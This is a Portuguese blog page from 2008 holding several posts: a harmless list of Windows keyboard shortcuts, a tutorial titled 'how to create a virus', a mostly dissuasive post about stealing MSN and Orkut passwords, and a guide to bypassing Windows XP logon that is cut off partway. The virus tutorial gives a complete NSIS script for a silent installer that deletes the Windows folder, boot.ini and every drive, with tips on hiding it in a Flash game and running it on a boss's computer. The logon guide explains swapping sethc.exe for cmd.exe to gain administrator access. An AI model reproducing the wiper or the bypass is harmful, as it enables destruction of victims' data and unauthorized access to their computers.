sábado, 9 de fevereiro de 2008

Atalhos de teclado no Windows
por Marcos EliasAtalhos de teclado no Windows... Uma lista completa! Se faltar algum, envie para cá!!! Ou deixe como um comentário. Esse tópico será fixo e atualizado enquanto possível... Windows, Internet Explorer e Windows Explorer.Nota: as SETAS DE DIREÇÃO são as teclas de setas, que normalmente ficam entre as letras e o teclado numérico, próximas da tecla DELETE. A tecla WIN é a que tem o logotipo do Windows, normalmente fica entre CTRL e ALT, exstem duas. Ao ver o sinal de "+", quer dizer que as teclas devem ser pressionadas juntas, assim: tecle a primeira, fique segurando, tecle a segunda (e assim por diante) e solte todas.Windows em geralWIN = Abre o menu Iniciar. Use as setas para navegar nas opções, e dê ENTER para abrir um item.WIN + D = Mostrar área de trabalho.WIN + M = Minimizar tudo.SHIFT + WIN + M = Desminimizar tudo.WIN + R = Executar.WIN + E = Abre o Windows Explorer.WIN + PAUSE BREAK = Propriedades do sistema.WIN + F = Pesquisar arquivos ou pastas.WIN + U = Gerenciador de utilitários.WIN + L = Bloquear computador ou trocar de usuário, sem fazer logoff.CTRL + ESC = Abre o menu Iniciar.CTRL + ALT + DEL = Gerenciador de tarefas, permite fechar programas travados. No Windows NT/2000/XP/Vista etc. pode abrir a janela "Segurança do Windows", com opções para trocar senha, fazer logoff ou abrir o gerenciador de tarefas.CTRL + SHIFT + ESC = Gerenciador de tarefas (com a vantagem de abri-lo direto, e não a tela de segurança, em algumas versões de Windows).ALT + LETRA SUBLINHADA DE MENUS OU BOTÕES = Acessa o menu ou botão. Use as setas de direção do teclado para se mover, ENTER para confirmar ou a barra de espaços para marcar ou desmarcar as caixinhas de marcação.ALT + TAB = Alterna as janelas abertas. Segure ALT e vá teclando TAB até selecionar a janela desejada, e então solte tudo.SHIFT + ALT + TAB = Alterna as janelas abertas, só que selecionando as anteriores, e não as próximas. Ao usar o ALT + TAB, você pode teclar ou soltar SHIFT quando precisar.ALT + ESC = Alterna diretamente para a janela anterior na barra de tarefas.CTRL + TAB = Alterna as guias (abas) das janelas que tem abas, avançando, e em alguns programas, alterna os documentos abertos.SHIFT + CTRL + TAB = Alterna as guias, voltando para as anteriores, em vez de avançar.ALT + F4 = Fecha a janela ativa. Se nenhuma janela estiver aberta, abre a caixa de diálogo "Desligar o computador".ALT + ESPAÇO = Abre o menu de controle da janela ativa (= clicar na barra de título com o botão direito do mouse ou, mais precisamente, clicar no ícone que fica à esquerda, na barra de título dos programas). Dica: use para maximizar, minimizar ou restaurar janelas pelo teclado.F10 = Seleciona os menus do programa atual. Use as setas de direção do teclado para se mover por eles.SHIFT + F10 = Corresponde a clicar com o botão direito no objeto selecionado ou em foco. Use as setas para escolher um item do menu, e ENTER para "clicá-lo". Pode-se usar diretamente a tecla que tem um menu com uma setinha, é a chama "tecla de atalho de aplicativo", que normalmente fica entre as teclas WIN DIREITA e CTRL de alguns teclados.PRINT SCREEN = Copia uma imagem da tela atual para a área de transferência. Basta colar no seu programa gráfico preferido (pode ser o Paint), ou num editor que aceite imagens (como o Word). Ideal para pegar ilustrações de tela sem precisar de programas de terceiros.ALT + PRINT SCREEN = Copia uma imagem apenas da janela ativa, e não da tela inteira (janela ativa é a janela que está em primeiro plano).Windows ExplorerConfira mais abaixo as dicas de seleção de textos, muitas valem para o trabalho com arquivos e pastas tambémF3 = Pesquisar arquivos na pasta atual.F4 = Abre a listinha da barra de endereços.F5 = Atualiza a janela atual.F6 = Seleciona o texto da barra de endereços.F11 = Abre a página em tela cheia. Tecle F11 para voltar ao normal.CTRL + H = Abre a lista do histórico.CTRL + I = Abre a lista dos favoritos.BACKSPACE = Abrir a pasta pai (acima).Cópia e seleção de textos ou arquivosCTRL + C = Copiar seleção.CTRL + V = Colar.CTRL + X = Recortar (mover).CTRL + A = Selecionar tudo do campo atual.CTRL + Z = Desfaz a última ação de edição, se possível. Cuidado ao usar no Windows Explorer, pois pode desrenomear uma pasta que acabou de ser renomeada, apagar arquivos que foram copiados ou mover de volta arquivos que foram movidos.Textos em diversos programasMuitos valem para arquivos no Windows Explorer tambémSETA ESQUERDA = Coloca o cursor um caractere anterior.SETA DIREITA = Coloca o cursor um caractere depois.SETA ACIMA = Vai para a linha de cima, na mesma coluna.SETA ABIXO = Vai para a linha de baixo, na mesma coluna.SHIFT + SETA ESQUERDA = Vai selecionando à esquerda do cursor. Segurando SHIFT, vá teclando a SETA ESQUERDA.SHIFT + SETA DIREITA = Idem anterior, seleciona à direita do cursor. Segure SHIFT e vá teclando SETA DIREITA.SHIFT + SETA ACIMA = Seleciona o texto compreendido entre a linha atual e a linha acima, na mesma coluna. Segure SHIFT e vá teclando SETA ACIMA para selecionar mais linhas para cima.SHIFT + SETA ABAIXO = Idem anterior, seleciona linhas para baixo.HOME = Coloca o cursor no começo da linha.END = Coloca o cursor no final da linha.SHIFT + HOME = Seleciona do cursor até o início da linha.SHIFT + END = Seleciona do cursor até o fim da linha.PAGE UP = Rola uma tela acima.PAGE DOWN = Rola uma tela abaixo.INSERT = Alterna entre inserir ou substituir caracteres ao digitar.DELETE = Exclui caracteres à direita do cursor.BACKSPACE = Exclui caracteres à esquerda do cursor.SHIFT + TECLA = Coloca o símbolo secundário da tecla. No caso das letras, alterna para caixa alta (maiúsculas).ALT DIREITA + TECLA = Coloca o símbolo terciário da tecla (nas que possuem três símbolos impressos na tecla).CAPS LOCK = Alterna maiúsculas e minúsculas ao digitar.Internet ExplorerBACKSPACE = Voltar (desde que nenhum campo de edição tenha o foco).SHIFT + BACKSPACE = Avançar (desde que nenhum campo de edição tenha o foco).ALT + HOME = Abre a página inicial.F3 = Pesquisar na web (não recomendado, prefisa usar seu site de busca favorito).F4 = Mostra a listinha da barra de endereços.F5 = Atualiza (recarrega) a página.F6 = Seleciona a barra de endereços.F11 = Abre a página em tela cheia. Tecle F11 para voltar ao normal. Dica: mesmo navegando em tela cheia, você pode teclar WIN para abrir o menu Iniciar ou usar o ALT+TAB para alternar entre as janelas abertas.CTRL + F = Pesquisar texto na página atual (é bom clicar logo no comecinho da página antes de dar CTRL+F, para deixar o cursor bem no início e então pesquisar a partir dali).CTRL + D = Adiciona a página atual nos favoritos.TAB = Avança de link em link ou de objeto em objeto na página. Tecle a barra de espaço para selecioar se for um campo de marcação, ou tecle ENTER para abrir, se for um botão ou link. O objeto ativo ficará cercado por um retângulo tracejado, para que você possa identificá-lo.SHIFT + TAB = A mesma coisa do TAB, só que em direção oposta. Ideal para voltar para links atrás ou quando você "passar" do ponto com o TAB.CTRL + H = Abre a lista de histórico, à esquerda.CTRL + I = Abre a lista dos favoritos, à esquerda.CTRL + O = Abrir arquivo, site ou uma URL qualquer.SHIFT + CLIQUE NUM LINK = Abre o link em nova janela, mantendo a atual aberta. A mesma coisa de clicar no link com o direito e escolher "Abrir em nova janela".HOME = Vai para o topo da página.END = Vai para o fim da página.ESPAÇO = Rola a tela para baixo.SHIFT + ESPAÇO = Rola a tela para cima.SETAS DE DIREÇÃO = Rolam a tela, para a direção da seta teclada (acima, abaixo, à esquerda e à direita).PAGE UP = Rola a tela para cimaPAGE DOWN = Rola a tela para baixo.Novos, do Internet Explorer 7 (com abas)CTRL + clique = Abrir link em nova aba, sem trazê-la para frente.CTRL + SHIFT + clique = Abrir link em nova aba, trazendo-a para a frente.CTRL + T = Nova aba.ALT + ENTER = Nova aba com a URL da barra de endereços (se ela estiver focada).ALT + ENTER = Nova aba para pesquisar o texto do campo de busca (se ele estiver focado).CTRL + Q = Ver miniaturas das abas. Clique na miniatura para ativar a aba correspondente.CTRL + TAB e CTRL + SHIFT + TAB = Alternar entre as abas (respectivamente, para frente e para trás).CTRL + n, onde "n" é um número de 1 a 8 = Alterna para a aba na "nª" posição.CTRL + 9 = Alterna para a última aba usada.CTRL + W = Fecha a aba atual.ALT + F4 = Fecha todas as abas (e a janela do navegador).CTRL + ALT + F4 = Fecha todas as outras abas, menos a atual.Atalhos de mouse no IE7:- Clique com o botão do meio num link = Abrir link em nova aba. - Duplo clique no espaço vazio à direita da última aba = Nova aba.- Clique com o Botão do meio numa aba = Fechar aba.
Dica: Como criar um vírus?
por Marcos EliasPra que você quer saber como criar um vírus? Bem... A responsabilidade é sua, blz? Nesta dica você terá uma aulinha prática de como criar um vírus que detona TUDO do HD.NÃO FAÇA COMENTÁRIOS COM MÁS INTENÇÕES. NÃO AJUDAREMOS VOCÊ A PREJUDICAR NINGUÉM. O CONTEÚDO DESTE ARTIGO VISA MOSTRAR NOÇÕES IMPORTANTES PARA TODOS OS LADOS. O USO QUE SE FARÁ DELE É DE TOTAL RESPONSABILIDADE DOS USUÁRIOS. COMENTÁRIOS INDESEJADOS SERÃO IGNORADOS, E CASO SEJAM OFENSIVOS OU VÁ CONTRA OS PRINCÍPIOS DO SITE, SERÃO REMOVIDOS SEM AVISO PRÉVIO.Um vírus é um programa do mal, que faz mal ao sistema operacional, a outros programas ou a arquivos do computador. Podem ser ainda de outros tipos, mas estes são os mais comuns. Basicamente, um vírus é um programa. Um programa com instruções que poderiam ser usadas para o bem, mas aplicadas para o mal. Portanto, para fazer um vírus, aprenda a fazer programas. Existem, no entanto, meios mais simples que permitem a criação de vírus usando determinadas estratégias, ferramentas e recursos já existentes. Além de saber fazer o vírus, você deve saber o que ele fará. O vírus ataca alguma coisa. Você deve conhecer essa coisa, seus pontos fracos e fortes, verificar caminhos por onde entrar. E como rodá-lo? O meio mais simples é convencer os usuários a executar o arquivo do vírus nos seus computadores. Ou você mesmo, por exemplo, pode executá-lo no computador do chefe enquanto ele estiver almoçando. Para ajudar, existem programas que embutem um executável dentro de outro, de modo que um seja executado normalmente, e o outro de forma oculta. Isso permite, por exemplo, criar um joguinho em flash (ou pegar uma dessas muitas animações distribuídas em .exe, o projetor do flash), embutir o vírus nele e mandar pra pessoa. Ela abre, vê o joguinho, acha lindo. E por trás de tudo isso, enquanto ela está distraída e entretida, o vírus trabalha. Ou simplesmente se copia para alguma pasta, cria entradas no registro do Windows para se iniciar na próxima sessão, e ataca a partir dali.E os anti-vírus, como ficam? Irão bloquear seu vírus? Eles não sabem se um programa é um vírus ou não, a menos que tenham a "identidade" deste programa marcada como "suja", como um vírus. Isso acontece quando o vírus fica muito divulgado, e acaba caindo nas mãos do pessoal das empresas de anti-vírus. Eles checam o arquivo, fazem testes e mais testes. Comprovado o caso de ser um vírus (ou seja, de ser um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma somatória MD5, um trecho de código existente no arquivo, uma seqüência de operações que provavelmente só existam naquele arquivo, etc). E cadastram esse código no anti-vírus. Ao fazer a varredura, se o anti-vírus identificar algum arquivo com algumas qualidades cadastradas em seu banco de dados, ele entenderá ele como vírus e tentará eliminá-lo ou notificar o usuário. Por isso é bom estar sempre com seu anti-vírus atualizado, pois praticamente todo dia surgem novos vírus. Estando atualizado, ele pode identificar os vírus mais recentes. Mesmo que um programa seja o pior vírus já inventado, se ele não estiver catalogado no anti-vírus, ele provavelmente se dará muito bem e executará suas funções. Depois? Depois é tarde, né. Já eu, particularmente, não uso anti-vírus, pois sei me cuidar. Não quero um programa verificando tudo o que faço e deixando meu micro mais lento. Muita gente reclama do Windows e talz e bla bla bla. Mas essa gente poderia parar um pouco e pensar nela mesma, nas atitudes. A maioria dos vírus e spywares só consegue realizar seus objetivos porque o usuário do computador vacilou. Mas blz, isso não vem ao caso agora.Um vírus não precisa ser necessariamente um programa. Você deve estudar e conhecer o que quer atacar, e usar meios para isso. Por exemplo, apagar arquivos. Criar um ".bat" com o comando "deltree %systemroot%" adaptado para não mostrar nada, por exemplo. Esse arquivo pode ser considerado um vírus, embora é um simples arquivo ASCII, de texto puro. O interpretador de comandos é que vai executar as ações, de acordo com o que estiver indicado. De forma semelhante agem os vírus de scripts e macros: por isso, é bom tomar cuidado com apresentações do Power Point de desconhecidos, arquivos do Word, etc. Não precisa ser paranóico e ficar sem abrir esses arquivos, basta pensar e desativar as macros no seu programa, entre outros cuidados. Usar o visualizador do PowerPoint, em vez do PowerPoint completo, é uma boa idéia para ver apresentações da Internet, já que as macros e arquivos vinculados nem serão interpretados. No caso de scripts ".js" ou ".vbs", só execute-os se souber realmente o que está fazendo. Destaco que esse ".js" não é de "JavaScript", pois esta mesma extensão é usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas paranóias. Não é porque a AIDS come solto que você vai deixar de transar com pessoas que conhece a pouco tempo ou na balada, mas deverá se cuidar, né? A mesma coisa pode ser dita em termos de PCs. Execute programas, rode, teste, fuce, explore, mas com responsa. Isso fica por sua conta. Do mesmo jeito que "sexo 100% seguro é não fazer sexo", eu diria que "navegar na Internet de forma 100% segura é não navegar na Internet". Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha legal, e pode pegar um resfriado... Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet (nem modem nem placa de rede ele tem).Bom, chega de teoria, não que não seja importante, mas já falei demais. Se você quer fazer vírus, arregace as mangas e parta para o estudo, você deverá estudar e fuçar muito. E cuidado para o feitiço não virar contra o feiticeiro, he he he.Vou mostrar como fazer um simples programinha devastador, que apaga TUDO do HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maioria e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).Apagar arquivos... Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um "falso" programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores...Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:!define PRODUCT_NAME "APAGADOR_XXX"!define PRODUCT_VERSION "1.0"!define PRODUCT_PUBLISHER "HACKER_XXX"SetCompressor lzmaName "${PRODUCT_NAME} ${PRODUCT_VERSION}"OutFile "MeuVirus.exe"InstallDir "$TEMP"Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"SilentInstall silentSection "Sec001" SEC01Delete /REBOOTOK "$WINDIR\*.*"SectionEndSection -PostRebootSectionEndSalve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:Delete /REBOOTOK "C:\boot.ini"Delete /REBOOTOK "C:\Meus documentos\*.*"Delete /REBOOTOK "C:\*.*"Delete /REBOOTOK "D:\*.*"Delete /REBOOTOK "E:\*.*"Delete /REBOOTOK "F:\*.*"Delete /REBOOTOK "G:\*.*"Delete /REBOOTOK "C:\Arquivos de programas\*.*"Adicione o que quiser, arquivos específicos, etc.A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.Fácil, não?Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.Por essas e outras, muito, muito cuidado ao abrir programas da Internet. Não clique naqueles banners de propaganda suspeitos, com carinhas lindas. Não clique no anúncio "Almente o tamanho do seu pênis". Não veja as montagens de fotos que não sei quem fez de você com não sei quem lá, e que te deixou um recado no orkut. Cuidado com os joguinhos em flash "executáveis"; se eles forem de origem desconhecida, tome mais cuidado ainda, prefira ver as versões em páginas HTML com o ".swf" separado. Mesmo se foi um amigo confiável que te passou, ele pode ter pego num site malicioso sem saber, ou então recebeu do primo do colega do vizinho da tia de outra cidade. Se você navega na Internet e mantém arquivos importantes no seu computador, considere o uso de uma conta de usuário restrita para navegar, ou use a conta de "Convidado", é o melhor a ser feito. Mantenha suas partições no Windows formatadas em NTFS, pois ao usar uma conta restrita, ela não terá acesso completo aos arquivos do sistema nem das outras pastas. Se o apagador que mostrei como criar, por exemplo, fosse rodado com uma conta de usuário restrita numa partição em NTFS, ele não conseguiria apagar praticamente NADA da pasta do Windows nem das outras pastas. O maior estrago seria na conta de usuário usada para rodá-lo, por isso se fosse um usuário restrito ou o convidado, seus arquivos estariam a salvo. Note que mesmo em NTFS, se você usasse a conta de administrador, boa parte dessa proteção iria por água abaixo, já que normalmente os administradores podem apagar arquivos do sistema e das outras pastas. E um programa executado como administrador, tem todos os direitos concedidos à conta de administrador. Ao instalar um programa, desmarque na instalação tudo o que for suspeito, especialmente se não estiver documentado. Muitas barras de ferramentas extras que aparecem no seu navegador foram instaladas junto com algum programa que você instalou "conscientemente", clicando em tudo, sem ler nada. LEIA. LEIA TUDO O QUE PUDER. Muitos spywares são documentados na licença de uso de um software, e muitos brasileiros que já não têm costume de ler mesmo, assim instalam ele sem saber. Um software que se preze e que respeite seus usuários deixa bem claro suas condições de uso, você só usa se concordar. E nada mais justo, se não concordar, simplesmente NÃO UTILIZE.Uma dica para usuários do Windows XP ou as versões superiores. Ao rodar um programa suspeito, ou animações em flash executáveis, joguinhos que se dizem que "não precisa instalar", etc, o Windows pode desativar algumas alterações que o programa tente realizar. Por exemplo, ele não conseguirá alterar NADA no registro, o que é uma grande vantagem. Claro, se o programa depender disso para funcionar, nada feito, ele não irá rodar ou mostrará uma série de mensagens de erro. Executar programas confiáveis assim pode fazer com que eles não funcionem também, pois é comum um programa ler e gravar dados no registro ao ser aberto ou fechado. Já um joguinho "não instalável" ou uma animação em flash não deveria fazer nada isso, né? Para executar um programa no modo restrito: clique com o botão direito do mouse no ícone do mesmo, escolha "Executar como". Deixe selecionado o seu nome de usuário, e deixe marcado o item "Proteger meu computador e meus dados contra atividades não autorizadas de programas". Dê OK. Abrindo o programa assim, entre outras coisas, ele não poderá alterar nada no registro do Windows. Se o item "Executar como" não aparecer no menu, selecione o arquivo, segure SHIFT e clique com o direito nele.Para programas suspeitos ou totalmente desconhecidos, eu recomendo testar em máquinas virtuais, como comentei mais acima. É melhor. Se der pau, dá só nela (a menos que você tenha arquivos no seu PC na rede compartilhados com permissão de escrita). Apague o arquivo do HD virtual e recopie a pasta. É mais prático do que usar uma máquina cobaia, tendo que reinstalar ou reparar tudo.Enfim, esta dica tem diversos públicos. Não estou incentivando o mal, mas tirando uma curiosidade de muita gente sobre os vírus. O uso que se fará dela é de responsabilidade de cada um, né?! Um martelo pode ser usado na construção da sua casa, dos seus móveis. Mas pode também servir também para estourar seus miolos. Tudo é relativo.Espero que você use o que leu aqui com responsabilidade. "Sexo? Use camisinha". "Internet? Juízo, previna-se dos vírus". Boa sorte!
Como roubar senhas do MSN e comunidades e profiles do orkut!
por Marcos EliasJá vi em tantos sites por aí, na boa, acho que vale a pena comentar disso aqui. Os leitores do blog que me desculpem, isso não se repetirá muito não... Estou para escrever sobre um site de busca muito famoso, e realmente, dá pra ver que vale a pena. Maaaas isso não tem nada a ver, vamos ao que interessa: roubar senhas do MSN e comunidades, ou perfis do orkut.Segundo o blog Novo Mundo você precisa de 1 vara de pescar, 2 caras de pau e 6 kg de sorte. No final, eles meio que zoam os lammers e noobs. O Thiago Madeira colcou um post no seu blog só para conseguir visitantes via Google (e funciona!), mas também zuando os lammers. E por aí está cheio disso.Aqui eu não vou enrolar, não vou zoar. Vou falar simplesmente a verdade. Quer roubar senhas do MSN ou orkut? Se vira! Se fosse fácil, ninguém usaria o orkut ou msn. Calma, o "se vira" não é zueira.Respeito os lammers e noobs, particularmente não gosto de ver quando são zoados em fóruns (mas muitos merecem e até fica divertido!). Se você quer mesmo roubar senhas de MSN, orkut, e-mail ou seja lá o que for, coloque isso na sua cabeça:- Leia e estude. Não é seguindo uma receita de bolo que você vai conseguir as coisas. Fico p* ao ver alunos que querem tudo pronto e mastigado, sem se interessar nem participar no desenvolvimento das atividades. Na Internet você não tem um professor para te explicar, você vai simplesmente se ferrar se quiser uma coisa e ir atrás de meios "feitos nas coxas" para roubar senhas ou seja lá o que for! Se ferrar em vários sentidos. Você poderá não conseguir, e ficar frustrado. Isso é ruim pra sua auto estima. Além disso, você poderá cair numa isca, baixar um programa que prometia o mundo e o fundo e se ferrar com um vírus, ou pior, ter a sua senha roubada.- Engenharia social. Se usar, use com cuidado. Muita gente cai, mas isso em muitos países é crime. E lembre-se: um dia poderá ser você! Se você não sabe, engenharia social é uma "técnica", digamos, de convencer a pessoa a te passar determinadas informações. Você se passa por um funcionário de uma empresa, por exemplo, para conseguir dados da pessoa e assim atacar, ou usar a seu favor. Assim como é crime você se passar por um funcionário da companhia de abastecimento de água para entrar na casa de uma pessoa - e fazer um assalto ou "arrastão", é crime você se passar pelo suporte do provedor para conseguir a senha da pessoa. Na Internet será mais difícil te pegarem, é verdade. Mas não é impossível!- Leia, leia, leia. Leia coisas úteis. Não vá atrás de fóruns ou comunidades que se dizem "hackers" com o intuito de roubar senhas (entre outras coisas). Você não conseguirá nada, ou conseguirá algo contra você (como já falei, será zuado(a), ficará com baixa auto estima e ainda poderá se f* legal). Saiba discernir conhecimentos reais do grande lixo que há espalhado na Internet.Eu via no João Kleber (um programa que tinha na RedeTV, emissora daqui de Sampa) várias pegadinhas onde o ator supostamente fazia o cara de tonto (até tem várias no Soh Zueira, bjo Camila e salve Flávio!). Por exemplo, "Como ganhar dinheiro". O cara cobrava para ensinar, tipo R$ 5 ou R$ 10, etc. O tonto pagava, então o cara falava "olha, o método é o seguinte... vc monta uma barraquinha na rua por aí, com uma placa tipo assim, 'como ganhar dinheiro', aí vai passando os troxas como vc assim e páram, e pagam pra vc explicar, aí vc explica isso q eu te falei e ganha o seu, como eu ganhei o meu!". Já deu pra imaginar, neah? Na Internet é mais ou menos assim. Como roubar senhas de MSN? Aí vc vê um cara num fórum ou mesmo um site que diz: "insira seu login e senha aqui, ou siga esse método tal que a senha da pessoa será enviada em algumas horas pro seu email...". Se você cair, a sua senha pelo menos o cara já tem. "Ele" conseguiu uma senha válida de msn (caso você tenha sito tonto ao extremo de fornecer dados verdadeiros), e você ficou na mão, literalmente. Cuide-se! Se você não gosta de andar como tonto na rua, porque andará como tonto na Internet, uma via mundial? Os perigos estão bem mais perto do que você pode imaginar. E se você for um vagabundo (me desculpe a palavra) que quer tudo de mãos dadas, terá mais chances de se ferrar, do que as pessoas com nível crítico que sabem discernir o bem e o mal.Algumas vezes boatos se espalham na Internet sobre formas de roubar senhas de determinados provedores. Quando verdadeiros, são baseados em erros nos sistemas ou brechas, que normalmente são corrigidos em pouco tempo após descobertos. Quando é usada a engenharia social, não há muito como escapar, aí na verdade vai de cada pessoa cuidar do que é seu (da sua integridade, das suas senhas). Vem também o problema com spywares, programas suspeitos que podem ser instalados no seu computador. Aí valem todas as regras, não rode programas de desconhecidos, não instale coisas suspeitas, programas que prometem muito sem mínimas referências... Nem caia naquela mensagem "olha as fotos que eu fiz com a gente" de um tal desconhecido que apareceu no seu orkut. Enfim, deu pra perceber, não adiata eu ficar dando "n" exemplos aqui. Existem muitas possibilidades!Concluindo, eu não escrevi esse texto para zoar os lammers. Se você é lammer, faça bom proveito desse texto, cujo objetivo principal é te abrir os olhos, te acordar. Acorda!Se ainda assim você quiser roubar senhas do MSN sem estudar ou apenas seguindo passos básicos e simples, siga a receita que encontrei no blog Novo Mundo:Método 100% prático! Funciona mesmo! Gratuito! Você - por um motivo que não cabe perguntar agora - quer roubar uma comunidade no orkut? Pois veio ao lugar certo! Vamos dar a receita exata:Você vai precisar:* 1 vara de pescar* 2 caras de pau* 6kg de sorteProcedimentos:Escreva para o dono da comunidade usando uma cara de pau e a vara de pescar. Peça a comunidade para ele. Com certeza ele não vai te passar a comunidade, e é aí que entra a outra cara de pau e os seis kilos de sorte.Misture os itens citados (cara de pau e sorte) e mande outro e-mail, desta vez se passando por funcionário do orkut. ATENÇÃO: Segundo a lei de alguns países isso pode ser considerado crime, então é melhor pedir a ajuda de um adulto. Neste e-mail peça que ele envie a senha dele por e-mail para o seu e-mail. Pronto! É só acessar o orkut dele e roubar a comunidade!Em 99% dos casos você não consegue a comunidade!Caso não consiga pelo método acima, clique aqui para baixar um programinha que torna tudo mais fácil.Obs: Tem gente oferecendo o Ubuntu para roubar comunidades, não caia nessa. O Ubuntu foi projetado para funcionar só com fotologs e não com orkut. Se quiser um sistema bom para roubar senhas, experimente esse aqui, é grátis e open source!Bom, esse final foi só para descontrair um pouco, afinal apesar de tudo, para quem mexe com info é praticamente impossível não dar risada dos lammers. Se você não quer que riam da sua cara, não seja tonto! Não seja lammer.
Hackeando as senhas no Windows: Guia Definitivo!
texto atualizado em 2007-04-29por Marcos EliasSeja por querer invadir um sistema alheio, por precisar instalar algo e ter perdido a senha de administrador, ou para recuperar o computador de um cliente (quem presta manutenção), você pode precisar de um meio de "quebrar" a senha de administrador do Windows, o sistema mais utilizado no mundo. É muito fácil, vamos ver neste tópíco os principais meios para fazer isso nas diversas versões de Windows. Em vez de colaborar com dificuldades, algumas brechas do Windows podem até mesmo "facilitar". O Windows XP, robusto e estável como ele só, e realmente digno de tanto mérito, vacilou legal, você vai ver (é um dos mais bobos e fáceis de se obter acesso como administrador, sem saber senha nenhuma). Segurança local? Esqueça! Qualquer um, qualquer um mesmo, com conta restrita ou até mesmo sem nenhuma conta de usuário, pode em poucos minutos obter acesso de administrador no computador, fazer o que quiser, e ainda sair sem deixar rastros. Vamos por partes, a começar pelo Windows mais usado hoje no mundo, o XP.Windows XP e Server 2003Simples assim, agradeço ao Rhadsclei, leitor do Explorando, que enviou a dica bem resumida pelo site. No Windows XP e até mesmo no seguro, firme, confiável, consistente, caro, estável, corporativo e robusto Windows Server 2003, basta trocar o
arquivo "sethc.exe", da pasta "system32", por qualquer programa que você queira. O ideal é copiar o "cmd.exe", o prompt de comando, e deixar a cópia com o nome "sethc.exe", dentro da pasta system32. Feito isso, inicie o sistema e segure SHIFT por 8 segundos, na tela de logon. O que será aberto? Deveria ser as opções de acessibilidade, mas como você trocou o arquivo, aparece um prompt de comando. Os programas executados no logon, no caso, o sethc.exe, são rodados com privilégios administrativos no Windows XP/2003. Digite algo como control userpasswords2 para criar uma nova conta de usuário; ou se preferir, selecione alguma conta da lista e altere a senha, altere o grupo do usuário para torná-lo administrador, etc. Dentro do prompt de comando rodando dessa forma, você pode até chamar o Explorer! E literalmente, usar o computador com direitos administrativos sem fazer logon. É interessante e decepcionante que no Windows XP e mais, no Server 2003, que é voltado a empresas (incluindo empresas de grande porte), isso seja possível, apenas trocando um arquivo. Escrevi um texto um tanto crítico (e não era para menos!) bem detalhado, inclusive com ilustrações de tela e as instruções passo a passo, publiquei no Guia do Hardware:www.guiadohardware.net/artigos/hackeando-senhas-windowsComo de praxe, "travo o computador mas mostro no gerenciador de tarefas qual processo foi o culpado". Ou seja, dou 